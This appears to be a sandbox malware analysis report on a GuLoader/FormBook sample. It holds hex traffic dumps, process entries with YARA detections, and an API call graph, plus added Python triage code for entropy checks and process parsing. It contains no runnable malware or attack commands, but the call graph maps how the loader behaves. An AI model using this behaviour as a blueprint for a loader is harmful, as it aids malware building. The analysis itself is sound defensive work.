                                            2025-01-11 03:42:16 UTC8000INData Raw: 74 d0 2c 83 02 12 a0 ba 49 fb f3 cb 17 c2 34 e8 79 77 71 3a 3e 8c 73 3c 7f d3 8a 8a 76 16 4c f4 47 5e 41 51 36 fe 1f 4b be 71 ad 64 26 77 30 1d 75 a9 b6 04 c9 11 19 ac ca c8 69 08 8f 65 36 20 01 62 a1 fd 1f 57 0a ef 4c d6 c3 4a 52 bb d0 6a 15 56 4d 9a 73 c6 aa f9 d0 fd 96 b7 63 e7 e6 fd 0d 8f 8e 9d 0a 96 5f 7e e7 d6 d1 05 b3 bb cb ca 4f bd 19 61 6b ab bf a4 f0 e9 17 35 3f 0b ff 64 77 fe dd af 6b ca 06 ca 2b 60 fc df 36 c6 a9 db d8 b2 b2 d4 3a cf bc 5a 85 af 46 d3 01 a8 98 d1 54 43 bc fe 3b d5 36 e3 2f 64 c0 e6 67 cf e9 bd 18 5b 7c 28 7b ed 88 66 8f 11 a8 d4 06 16 50 9d c5 cd 79 9a 12 03 76 70 ba d8 d1 e8 81 de 25 84 46 1b 00 70 39 bb 40 e6 82 9c 1e b7 e8 b5 0f f4 5e 68 cf af cc db f1 4e 7e ab 56 34 f0 e7 00 8d d8 15 a3 0e 40 5e ef 1b 33 7e 8c 67 bb 0a 49
                                            Data Ascii: t,I4ywq:>s<vLG^AQ6Kqd&w0uie6 bWLJRjVMsc_~Oak5?dwk+`6:ZFTC;6/dg[|({fPyvp%Fp9@^hN~V4@^3~gI
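The "Data Raw" lines above are the raw bytes of the inbound stream that the report tags as "UTC8000IN" (read here as port 8000, direction IN; that reading of the prefix is an assumption), and the "Data Ascii" column, which keeps only printable bytes, is unreadable. A practitioner's first check on such a dump is whether the payload is really encrypted rather than merely binary. The following is added example code written for this page, not part of the Joe Sandbox report: it parses one "Data Raw" line in the layout shown above (the first line of the 03:42:16 burst, copied verbatim), measures its Shannon entropy and longest printable run, and contrasts it with a constructed plaintext HTTP request. Encrypted application data sits near 8 bits per byte (a 255-byte sample is biased a little lower simply because 256 symbols cannot all appear), while HTTP text sits well below 6. The line-format regex is inferred from the visible lines.

```python
"""Added example (not part of the Joe Sandbox report): is the port-8000
stream above really encrypted?  Parse one 'Data Raw' line in the report's
own layout and compare its Shannon entropy with a constructed plaintext
HTTP request.
"""
import math
import re
from collections import Counter

# Line layout assumed from the dump above:
#   '<date> <time> UTC<port><IN|OUT>Data Raw: <hex bytes separated by spaces>'
_RAW_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC(?P<port>\d+)(?P<dir>IN|OUT)"
    r"Data Raw: (?P<hex>[0-9a-f]{2}(?: [0-9a-f]{2})*)$"
)

# First 'Data Raw' line of the 03:42:16 burst, copied verbatim from the report (255 bytes).
SAMPLE_LINE = (
    "2025-01-11 03:42:16 UTC8000INData Raw: "
    "a5 66 36 e7 5f 0c 40 a1 1c 0e 91 9a bb 49 57 39 f5 4a 98 02 26 51 03 35 ad 65 ff 71 88 b0 "
    "63 48 27 d8 1b ab ae ef 43 33 c3 67 60 d8 d4 ba fb f5 04 01 62 23 8c 90 7a ca 22 08 c8 e2 "
    "55 ee 3e f5 86 5b 3b 46 4d a5 3f 52 a9 76 a5 11 58 b9 2d 67 27 dc cc d5 43 9c d4 34 8e 4e "
    "52 4e 00 e0 ce fd bc de 60 84 63 4c 30 00 bc 67 47 f0 58 00 18 4f a0 95 44 a9 7b ac 57 b7 "
    "ee 31 fa 83 1f 2d 16 87 34 67 6a 80 a1 5f b4 1e 9f 58 5c d2 59 5f 05 87 bd 8b cc 34 16 2d "
    "69 d3 41 72 e1 58 b8 34 23 17 4f 0d 92 0e 57 0f 9b f5 21 26 f0 a4 14 c9 8f a0 06 09 a1 c7 "
    "2b 6a 40 74 ea bc f0 87 2c 18 87 91 ee 73 28 d0 74 49 38 cc b9 96 59 bb 90 52 93 c9 e4 16 "
    "9a 1d 76 be cf fd 3c 90 8a d6 f5 6a 18 d6 af f5 ea 27 d8 f1 ba d4 42 3f 4a d6 6c dd c5 21 "
    "fa 62 11 4a ec f9 2f 11 2f 04 33 ef 48 83 b2"
)

# Constructed plaintext of comparable size for contrast (not from the report).
PLAINTEXT_HTTP = (
    b"GET /update.php?id=1 HTTP/1.1\r\nHost: example.invalid\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"Accept: */*\r\nConnection: keep-alive\r\n\r\n"
)


def parse_raw_line(line):
    """Return {'ts', 'port', 'dir', 'data'} for one 'Data Raw' line of the report."""
    m = _RAW_LINE.match(line.strip())
    if not m:
        raise ValueError("not a Data Raw line")
    return {"ts": m["ts"], "port": int(m["port"]), "dir": m["dir"],
            "data": bytes.fromhex(m["hex"].replace(" ", ""))}


def shannon_entropy(data):
    """Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def longest_printable_run(data):
    """Length of the longest run of consecutive printable ASCII bytes (0x20..0x7e)."""
    best = run = 0
    for b in data:
        run = run + 1 if 0x20 <= b < 0x7F else 0
        best = max(best, run)
    return best


def looks_encrypted(data, min_entropy=6.5, max_run=16):
    """Heuristic: near-uniform byte distribution and no long printable runs.
    The default threshold is lowered from the textbook ~7.5 because samples of a
    few hundred bytes bias the entropy estimate downward."""
    return shannon_entropy(data) >= min_entropy and longest_printable_run(data) < max_run


def classify_line(line):
    """Parse one report line and attach the entropy verdict."""
    rec = parse_raw_line(line)
    rec["entropy"] = round(shannon_entropy(rec["data"]), 2)
    rec["encrypted"] = looks_encrypted(rec["data"])
    return rec
```

Run over every "Data Raw" line of a stream, the verdict should be uniform; a sudden drop in entropy inside an otherwise encrypted stream is worth a second look, because it usually marks a handshake, a keep-alive, or a plaintext fallback.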


                                            Target ID:0
                                            Start time:22:41:05
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                            Imagebase:0x400000
                                            File size:437'610 bytes
                                            MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:22:41:57
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                            Imagebase:0x400000
                                            File size:437'610 bytes
                                            MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true
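The two entries above are the same image launched twice with the same command line: Target 0 starts at 22:41:05 and its memory matches the GuLoader rule in a region at 0x507C000, Target 6 starts 52 seconds later and its memory matches the FormBook rule in a region at 0x365B0000. The following is added example code written for this page, not part of the Joe Sandbox report: it parses these entries in the report's own "Key:Value" layout (trimmed to the fields used), decodes the dump names in the Yara "Source" fields, and flags the pattern a triage analyst looks for, a self-relaunch whose child carries a family the parent did not. The dump-name interpretation is an assumption not documented on this page: the fields are read as process index, region base address, and the Windows MEMORY_BASIC_INFORMATION Protect, State and Type values in hex. The constants are the standard Windows ones and are consistent with the values shown (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE for the parent's GuLoader region; 0x04 = PAGE_READWRITE for the child's FormBook region).

```python
"""Added example (not part of the Joe Sandbox report): parse the 'Target ID'
process entries above, decode the memory-dump names in the Yara 'Source'
fields, and flag a re-launch of the same image whose child matches a
family the parent did not.

Assumption, not documented on this page: a dump name
  <proc index>.<n>.<n>.<region base>.<protect>.<state>.<type>.<n>.sdmp
carries the region base and MEMORY_BASIC_INFORMATION Protect/State/Type in hex.
"""
import re

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

_YARA = re.compile(r"Rule: (?P<rule>[^,]+), Description: (?P<desc>[^,]+), "
                   r"Source: (?P<source>[^,]+), Author: (?P<author>.+)")

# The two process entries from the report, trimmed to the fields this example uses.
SAMPLE_REPORT = r"""
Target ID:0
Start time:22:41:05
Path:C:\Users\user\Desktop\Ntwph4urc1.exe
Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Target ID:6
Start time:22:41:57
Path:C:\Users\user\Desktop\Ntwph4urc1.exe
Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
"""


def parse_process_blocks(text):
    """One dict per 'Target ID' block: 'Key:Value' lines plus a 'yara' list of rule matches."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            cur = {"yara": []}
            procs.append(cur)
        if cur is None:
            continue
        if line.startswith("•"):                       # Yara bullet under 'Yara matches:'
            m = _YARA.search(line)
            if m:
                cur["yara"].append(m.groupdict())
            continue
        key, sep, value = line.partition(":")          # split on the first colon only
        if sep:
            cur[key.strip()] = value.strip()
    return procs


def decode_dump_source(source):
    """Decode a .sdmp name into process index, region base and MBI flags (see assumption above)."""
    parts = source.split(".")
    protect, state, mtype = (int(parts[i], 16) for i in (4, 5, 6))
    return {"process_index": int(parts[0]), "base": int(parts[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "state": MEM_STATE.get(state, hex(state)),
            "type": MEM_TYPE.get(mtype, hex(mtype)),
            "rwx": protect in EXECUTABLE and protect in WRITABLE}


def families(proc):
    """Malware families named in a process's Yara descriptions ('Yara detected <family>')."""
    return {y["desc"].replace("Yara detected ", "") for y in proc["yara"]}


def self_spawn_family_changes(procs):
    """(parent id, child id, new families) for a re-launch of the same path and command line
    whose child matches a family the parent did not. Sorts by 'Start time' (same-day HH:MM:SS)."""
    groups = {}
    for p in procs:
        groups.setdefault((p.get("Path"), p.get("Commandline")), []).append(p)
    findings = []
    for group in groups.values():
        group = sorted(group, key=lambda p: p.get("Start time", ""))
        parent = group[0]
        for child in group[1:]:
            new = families(child) - families(parent)
            if new:
                findings.append((parent["Target ID"], child["Target ID"], sorted(new)))
    return findings


def rwx_private_regions(procs):
    """Yara-matched regions that are private, writable and executable: the usual unpacked-code marker."""
    out = []
    for p in procs:
        for y in p["yara"]:
            d = decode_dump_source(y["source"])
            if d["rwx"] and d["type"] == "MEM_PRIVATE":
                out.append((p["Target ID"], d["base"], d["protect"]))
    return out
```

The two decoded regions tell the story in one line each: the parent holds a committed private RWX region (unpacked loader code), the child holds a committed private RW region at a high address (the injected payload), and the only thing that changed between the two processes is what is in memory, not what is on disk.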


                                              Execution Graph

                                              Execution Coverage:18.7%
                                              Dynamic/Decrypted Code Coverage:13.6%
                                              Signature Coverage:15.9%
                                              Total number of Nodes:1580
                                              Total number of Limit Nodes:32
                                              execution_graph (interactive call-graph view; the raw node and edge token stream is condensed here)
                                              Nodes are function start addresses annotated with the Win32 APIs they call, or with a collapsed call count ("N API calls"); edges are call relationships between nodes.
                                              Address ranges: 0x401000 through 0x406876 lie inside the main image (ImageBase 0x400000); 0x73f51058 through 0x73f52dce lie in a second loaded module whose name is not given on this page. The main image resolves that module through GetModuleHandleW (0x4020fa) / LoadLibraryExW (0x402108) and GetProcAddress (0x406876) and enters it at 0x73f51777 from 0x402149.
                                              Memory and loader APIs reached: VirtualAlloc (0x73f52712), VirtualProtect (0x73f529ef), VirtualFree (0x73f516b7), GlobalAlloc, GlobalFree, GlobalSize, LoadLibraryW, LoadLibraryExW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, FreeLibrary.
                                              File system APIs: CreateFileA (0x73f52baf), CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileSize, DeleteFileW, MoveFileW, MoveFileExW, FindFirstFileW, FindNextFileW, FindClose, GetFileAttributesW, SetFileAttributesW, SetFileTime, CompareFileTime, CreateDirectoryW, RemoveDirectoryW, SetFileSecurityW, SetCurrentDirectoryW, GetShortPathNameW, GetFullPathNameW, GetPrivateProfileStringW, SHFileOperationW.
                                              Registry, shell and COM APIs: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, CLSIDFromString, IIDFromString, StringFromGUID2.
                                              Window and dialog APIs: CreateDialogParamW, FindWindowExW, SendMessageW, SendMessageTimeoutW, CallWindowProcW, SetWindowLongW, GetWindowLongW, SetClassLongW, ShowWindow, EnableWindow, IsWindowEnabled, IsWindowVisible, SetForegroundWindow, SetWindowPos, GetWindowRect, DestroyWindow, EndDialog, MessageBoxIndirectW, CreateFontIndirectW, GetDlgItem, SetDlgItemTextW, SetWindowTextW, GetSystemMenu, EnableMenuItem, GetMessagePos, ScreenToClient, GetDC, ReleaseDC, GetDeviceCaps, BeginPaint, GetClientRect, GetSysColor, SetBkColor, SetBkMode, SetTextColor, CreateBrushIndirect, DeleteObject, KiUserCallbackDispatcher.
                                              String and miscellaneous APIs: lstrcpyA, lstrcpyW, lstrcpynW, lstrcatW, lstrlenA, lstrlenW, lstrcmpW, lstrcmpiA, lstrcmpiW, CharNextA, CharNextW, CharPrevW, wsprintfA, wsprintfW, MultiByteToWideChar, WideCharToMultiByte, GetLastError, CloseHandle, MulDiv, Sleep (0x4014dd).
                                              Symbols seen in the second module: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z and __allrem (0x73f51943).
5376->5377 5378 40100c DefWindowProcW 5376->5378 5380 4010f3 5377->5380 5381 401179 5378->5381 5382 401073 CreateBrushIndirect FillRect DeleteObject 5380->5382 5383 4010fc 5380->5383 5382->5380 5384 401102 CreateFontIndirectW 5383->5384 5385 401167 EndPaint 5383->5385 5384->5385 5386 401112 6 API calls 5384->5386 5385->5381 5386->5385 5387 401d81 5388 401d94 GetDlgItem 5387->5388 5389 401d87 5387->5389 5391 401d8e 5388->5391 5390 402d1c 17 API calls 5389->5390 5390->5391 5392 401dd5 GetClientRect LoadImageW SendMessageW 5391->5392 5393 402d3e 17 API calls 5391->5393 5395 401e33 5392->5395 5397 401e3f 5392->5397 5393->5392 5396 401e38 DeleteObject 5395->5396 5395->5397 5396->5397 5398 402482 5399 402d3e 17 API calls 5398->5399 5400 402494 5399->5400 5401 402d3e 17 API calls 5400->5401 5402 40249e 5401->5402 5415 402dce 5402->5415 5405 402bc2 5406 4024d6 5407 4024e2 5406->5407 5409 402d1c 17 API calls 5406->5409 5410 402501 RegSetValueExW 5407->5410 5412 40324c 31 API calls 5407->5412 5408 402d3e 17 API calls 5411 4024cc lstrlenW 5408->5411 5409->5407 5413 402517 RegCloseKey 5410->5413 5411->5406 5412->5410 5413->5405 5416 402de9 5415->5416 5419 406289 5416->5419 5420 406298 5419->5420 5421 4062a3 RegCreateKeyExW 5420->5421 5422 4024ae 5420->5422 5421->5422 5422->5405 5422->5406 5422->5408 5423 402902 5424 402d3e 17 API calls 5423->5424 5425 402909 FindFirstFileW 5424->5425 5426 402931 5425->5426 5429 40291c 5425->5429 5427 40293a 5426->5427 5431 406335 wsprintfW 5426->5431 5432 4063ee lstrcpynW 5427->5432 5431->5427 5432->5429 5433 401503 5434 40150b 5433->5434 5436 40151e 5433->5436 5435 402d1c 17 API calls 5434->5435 5435->5436 5437 404503 5438 40451b 5437->5438 5444 404635 5437->5444 5445 404344 18 API calls 5438->5445 5439 40469f 5440 404769 5439->5440 5441 4046a9 GetDlgItem 5439->5441 5447 4043ab 8 API calls 5440->5447 5442 4046c3 5441->5442 5443 40472a 5441->5443 5442->5443 5451 4046e9 SendMessageW LoadCursorW SetCursor 5442->5451 5443->5440 5452 40473c 
5443->5452 5444->5439 5444->5440 5448 404670 GetDlgItem SendMessageW 5444->5448 5446 404582 5445->5446 5449 404344 18 API calls 5446->5449 5450 404764 5447->5450 5470 404366 KiUserCallbackDispatcher 5448->5470 5454 40458f CheckDlgButton 5449->5454 5474 4047b2 5451->5474 5456 404752 5452->5456 5457 404742 SendMessageW 5452->5457 5468 404366 KiUserCallbackDispatcher 5454->5468 5456->5450 5462 404758 SendMessageW 5456->5462 5457->5456 5458 40469a 5471 40478e 5458->5471 5462->5450 5463 4045ad GetDlgItem 5469 404379 SendMessageW 5463->5469 5465 4045c3 SendMessageW 5466 4045e0 GetSysColor 5465->5466 5467 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5465->5467 5466->5467 5467->5450 5468->5463 5469->5465 5470->5458 5472 4047a1 SendMessageW 5471->5472 5473 40479c 5471->5473 5472->5439 5473->5472 5477 405a1a ShellExecuteExW 5474->5477 5476 404718 LoadCursorW SetCursor 5476->5443 5477->5476 5478 73f5103d 5481 73f5101b 5478->5481 5482 73f51516 GlobalFree 5481->5482 5483 73f51020 5482->5483 5484 73f51024 5483->5484 5485 73f51027 GlobalAlloc 5483->5485 5486 73f5153d 3 API calls 5484->5486 5485->5484 5487 73f5103b 5486->5487 5488 402889 5489 402890 5488->5489 5492 402b0d 5488->5492 5490 402d1c 17 API calls 5489->5490 5491 402897 5490->5491 5493 4028a6 SetFilePointer 5491->5493 5493->5492 5494 4028b6 5493->5494 5496 406335 wsprintfW 5494->5496 5496->5492 5497 404b8b 5498 404bb7 5497->5498 5499 404b9b 5497->5499 5501 404bea 5498->5501 5502 404bbd SHGetPathFromIDListW 5498->5502 5508 405a38 GetDlgItemTextW 5499->5508 5504 404bd4 SendMessageW 5502->5504 5505 404bcd 5502->5505 5503 404ba8 SendMessageW 5503->5498 5504->5501 5506 40140b 2 API calls 5505->5506 5506->5504 5508->5503 5509 40190c 5510 401943 5509->5510 5511 402d3e 17 API calls 5510->5511 5512 401948 5511->5512 5513 405b00 67 API calls 5512->5513 5514 401951 5513->5514 5515 40190f 5516 402d3e 17 API calls 5515->5516 5517 401916 5516->5517 5518 405a54 MessageBoxIndirectW 5517->5518 5519 40191f 
5518->5519 5520 401491 5521 405456 24 API calls 5520->5521 5522 401498 5521->5522 5523 401f12 5524 402d3e 17 API calls 5523->5524 5525 401f18 5524->5525 5526 402d3e 17 API calls 5525->5526 5527 401f21 5526->5527 5528 402d3e 17 API calls 5527->5528 5529 401f2a 5528->5529 5530 402d3e 17 API calls 5529->5530 5531 401f33 5530->5531 5532 401423 24 API calls 5531->5532 5533 401f3a 5532->5533 5540 405a1a ShellExecuteExW 5533->5540 5535 401f82 5536 402925 5535->5536 5541 40688e WaitForSingleObject 5535->5541 5538 401f9f CloseHandle 5538->5536 5540->5535 5542 4068a8 5541->5542 5543 4068ba GetExitCodeProcess 5542->5543 5544 40681f 2 API calls 5542->5544 5543->5538 5545 4068af WaitForSingleObject 5544->5545 5545->5542 5546 402614 5547 402d3e 17 API calls 5546->5547 5548 40261b 5547->5548 5551 405ee4 GetFileAttributesW CreateFileW 5548->5551 5550 402627 5551->5550 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4938 4057c0 4934->4938 4939 405787 ShowWindow ShowWindow 4934->4939 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4943 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4943 4940 4057a7 4937->4940 4941 4057fb 4937->4941 4942 4043ab 8 API calls 4938->4942 4978 404379 SendMessageW 4939->4978 4945 4057d5 ShowWindow 4940->4945 4946 4057af 4940->4946 4941->4938 4951 405809 SendMessageW 4941->4951 4958 4057ce 4942->4958 4949 40569b 4943->4949 4950 40567f SendMessageW SendMessageW 4943->4950 4947 4057f5 4945->4947 4948 4057e7 4945->4948 4952 40431d SendMessageW 4946->4952 4954 40431d SendMessageW 4947->4954 4953 405456 24 API calls 4948->4953 4955 4056a0 SendMessageW 4949->4955 4956 4056ae 4949->4956 4950->4949 4957 405822 CreatePopupMenu 4951->4957 4951->4958 4952->4938 4953->4947 4954->4941 4955->4956 4960 404344 18 API calls 4956->4960 4959 40642b 17 API calls 
4957->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4963 405862 TrackPopupMenu 4961->4963 4964 40584f GetWindowRect 4961->4964 4965 4056c7 ShowWindow 4962->4965 4966 4056fb GetDlgItem SendMessageW 4962->4966 4963->4958 4968 40587d 4963->4968 4964->4963 4969 4056ea 4965->4969 4970 4056dd ShowWindow 4965->4970 4966->4958 4967 405722 SendMessageW SendMessageW 4966->4967 4967->4958 4971 405899 SendMessageW 4968->4971 4977 404379 SendMessageW 4969->4977 4970->4969 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4958 4976->4936 4977->4966 4978->4937 5552 73f52ca3 5553 73f52cbb 5552->5553 5554 73f5158f 2 API calls 5553->5554 5555 73f52cd6 5554->5555 5556 402596 5557 402d7e 17 API calls 5556->5557 5558 4025a0 5557->5558 5559 402d1c 17 API calls 5558->5559 5560 4025a9 5559->5560 5561 402925 5560->5561 5562 4025d1 RegEnumValueW 5560->5562 5563 4025c5 RegEnumKeyW 5560->5563 5564 4025e6 RegCloseKey 5562->5564 5563->5564 5564->5561 5566 401d17 5567 402d1c 17 API calls 5566->5567 5568 401d1d IsWindow 5567->5568 5569 401a20 5568->5569 4988 401b9b 4989 401bec 4988->4989 4993 401ba8 4988->4993 4990 401bf1 4989->4990 4991 401c16 GlobalAlloc 4989->4991 5001 402395 4990->5001 5009 4063ee lstrcpynW 4990->5009 4992 40642b 17 API calls 4991->4992 4996 401c31 4992->4996 4993->4996 4997 401bbf 4993->4997 4994 40642b 17 API calls 4998 40238f 4994->4998 4996->4994 4996->5001 5007 4063ee lstrcpynW 4997->5007 4998->5001 5002 405a54 MessageBoxIndirectW 4998->5002 4999 401c03 GlobalFree 4999->5001 5002->5001 5003 401bce 5008 4063ee lstrcpynW 5003->5008 5005 401bdd 5010 4063ee lstrcpynW 5005->5010 5007->5003 5008->5005 5009->4999 5010->5001 5570 402b9d SendMessageW 5571 402bc2 5570->5571 5572 402bb7 InvalidateRect 5570->5572 5572->5571 5573 40149e 5574 402395 5573->5574 5575 4014ac PostQuitMessage 5573->5575 5575->5574 4257 
4034a2 SetErrorMode GetVersion 4258 4034e1 4257->4258 4259 4034e7 4257->4259 4260 4067e3 5 API calls 4258->4260 4261 406773 3 API calls 4259->4261 4260->4259 4262 4034fd lstrlenA 4261->4262 4262->4259 4263 40350d 4262->4263 4264 4067e3 5 API calls 4263->4264 4265 403514 4264->4265 4266 4067e3 5 API calls 4265->4266 4267 40351b 4266->4267 4268 4067e3 5 API calls 4267->4268 4269 403527 #17 OleInitialize SHGetFileInfoW 4268->4269 4347 4063ee lstrcpynW 4269->4347 4272 403573 GetCommandLineW 4348 4063ee lstrcpynW 4272->4348 4274 403585 4275 405cf0 CharNextW 4274->4275 4276 4035aa CharNextW 4275->4276 4277 4036d4 GetTempPathW 4276->4277 4284 4035c3 4276->4284 4349 403471 4277->4349 4279 4036ec 4280 4036f0 GetWindowsDirectoryW lstrcatW 4279->4280 4281 403746 DeleteFileW 4279->4281 4285 403471 12 API calls 4280->4285 4359 403015 GetTickCount GetModuleFileNameW 4281->4359 4282 405cf0 CharNextW 4282->4284 4284->4282 4289 4036bf 4284->4289 4291 4036bd 4284->4291 4287 40370c 4285->4287 4286 40375a 4292 4037fd 4286->4292 4296 405cf0 CharNextW 4286->4296 4343 40380d 4286->4343 4287->4281 4288 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4287->4288 4290 403471 12 API calls 4288->4290 4443 4063ee lstrcpynW 4289->4443 4294 40373e 4290->4294 4291->4277 4387 403abd 4292->4387 4294->4281 4294->4343 4313 403779 4296->4313 4299 403947 4301 4039cb ExitProcess 4299->4301 4302 40394f GetCurrentProcess OpenProcessToken 4299->4302 4300 403827 4453 405a54 4300->4453 4307 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4302->4307 4308 40399b 4302->4308 4304 4037d7 4310 405dcb 18 API calls 4304->4310 4305 40383d 4311 4059bf 5 API calls 4305->4311 4307->4308 4312 4067e3 5 API calls 4308->4312 4314 4037e3 4310->4314 4315 403842 lstrcatW 4311->4315 4316 4039a2 4312->4316 4313->4304 4313->4305 4314->4343 4444 4063ee lstrcpynW 4314->4444 4317 403853 lstrcatW 4315->4317 4318 40385e lstrcatW lstrcmpiW 4315->4318 4319 4039b7 ExitWindowsEx 4316->4319 4322 4039c4 
4316->4322 4317->4318 4321 40387a 4318->4321 4318->4343 4319->4301 4319->4322 4324 403886 4321->4324 4325 40387f 4321->4325 4462 40140b 4322->4462 4323 4037f2 4445 4063ee lstrcpynW 4323->4445 4329 4059a2 2 API calls 4324->4329 4328 405925 4 API calls 4325->4328 4330 403884 4328->4330 4331 40388b SetCurrentDirectoryW 4329->4331 4330->4331 4332 4038a6 4331->4332 4333 40389b 4331->4333 4458 4063ee lstrcpynW 4332->4458 4457 4063ee lstrcpynW 4333->4457 4336 4038b4 4337 40642b 17 API calls 4336->4337 4340 40393b 4336->4340 4342 4061b4 36 API calls 4336->4342 4344 40642b 17 API calls 4336->4344 4346 403926 CloseHandle 4336->4346 4459 4059d7 CreateProcessW 4336->4459 4338 4038e5 DeleteFileW 4337->4338 4338->4336 4339 4038f2 CopyFileW 4338->4339 4339->4336 4341 4061b4 36 API calls 4340->4341 4341->4343 4342->4336 4446 4039e3 4343->4446 4344->4336 4346->4336 4347->4272 4348->4274 4350 40669d 5 API calls 4349->4350 4351 40347d 4350->4351 4352 403487 4351->4352 4353 405cc3 3 API calls 4351->4353 4352->4279 4354 40348f 4353->4354 4355 4059a2 2 API calls 4354->4355 4356 403495 4355->4356 4465 405f13 4356->4465 4469 405ee4 GetFileAttributesW CreateFileW 4359->4469 4361 403055 4380 403065 4361->4380 4470 4063ee lstrcpynW 4361->4470 4363 40307b 4364 405d0f 2 API calls 4363->4364 4365 403081 4364->4365 4471 4063ee lstrcpynW 4365->4471 4367 40308c GetFileSize 4368 403186 4367->4368 4386 4030a3 4367->4386 4472 402fb1 4368->4472 4370 40318f 4372 4031bf GlobalAlloc 4370->4372 4370->4380 4507 40345a SetFilePointer 4370->4507 4483 40345a SetFilePointer 4372->4483 4373 4031f2 4377 402fb1 6 API calls 4373->4377 4376 4031da 4484 40324c 4376->4484 4377->4380 4378 4031a8 4381 403444 ReadFile 4378->4381 4380->4286 4383 4031b3 4381->4383 4382 402fb1 6 API calls 4382->4386 4383->4372 4383->4380 4384 4031e6 4384->4380 4384->4384 4385 403223 SetFilePointer 4384->4385 4385->4380 4386->4368 4386->4373 4386->4380 4386->4382 4504 403444 4386->4504 4388 4067e3 5 API calls 4387->4388 4389 403ad1 
4388->4389 4390 403ad7 GetUserDefaultUILanguage 4389->4390 4391 403ae9 4389->4391 4513 406335 wsprintfW 4390->4513 4392 4062bc 3 API calls 4391->4392 4394 403b19 4392->4394 4396 403b38 lstrcatW 4394->4396 4397 4062bc 3 API calls 4394->4397 4395 403ae7 4514 403d93 4395->4514 4396->4395 4397->4396 4400 405dcb 18 API calls 4401 403b6a 4400->4401 4402 403bfe 4401->4402 4404 4062bc 3 API calls 4401->4404 4403 405dcb 18 API calls 4402->4403 4405 403c04 4403->4405 4406 403b9c 4404->4406 4407 403c14 LoadImageW 4405->4407 4408 40642b 17 API calls 4405->4408 4406->4402 4414 403bbd lstrlenW 4406->4414 4415 405cf0 CharNextW 4406->4415 4409 403cba 4407->4409 4410 403c3b RegisterClassW 4407->4410 4408->4407 4413 40140b 2 API calls 4409->4413 4411 403c71 SystemParametersInfoW CreateWindowExW 4410->4411 4412 403cc4 4410->4412 4411->4409 4412->4343 4418 403cc0 4413->4418 4416 403bf1 4414->4416 4417 403bcb lstrcmpiW 4414->4417 4419 403bba 4415->4419 4421 405cc3 3 API calls 4416->4421 4417->4416 4420 403bdb GetFileAttributesW 4417->4420 4418->4412 4423 